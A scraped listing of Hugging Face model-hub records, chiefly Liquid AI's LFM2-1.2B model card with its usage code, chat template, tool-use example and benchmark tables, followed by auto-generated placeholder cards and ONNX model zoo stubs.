| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
LiquidAI/LFM2-1.2B
|
LiquidAI
| 2025-09-23T14:49:12Z | 31,961 | 294 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:50Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-1.2B
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6 parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-1.2B"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-1.2B")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-1.2B-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
aamijar/Llama-2-13b-hf-lora-r8-boolq-epochs2
|
aamijar
| 2025-09-23T14:46:41Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T14:46:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
LYGreen/my-catgirl-qwen3-2507-4b
|
LYGreen
| 2025-09-23T14:46:33Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T14:46:18Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** LYGreen
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
alpcaferoglu/Qwen2.5-Coder-3B-Instruct_bd_cs_t2sws-t2s_r64_a64_e1_bs2_gas4_lr7.5e-05_fs0f_cvdt_sftreason
|
alpcaferoglu
| 2025-09-23T14:46:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T02:12:23Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/resnext50d_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:50Z |
---
language: en
license: apache-2.0
model_name: resnext50d_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext50_32x4d_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:40Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:32Z |
---
language: en
license: apache-2.0
model_name: resnext50_32x4d_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext50_32x4d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:43:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:14Z |
---
language: en
license: apache-2.0
model_name: resnext50_32x4d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:08Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:02Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:42:37Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:18Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:42:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:58Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x4d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:36Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:23Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x4d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:09Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50x1_bit_distilled_Opset17
|
onnxmodelzoo
| 2025-09-23T14:40:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
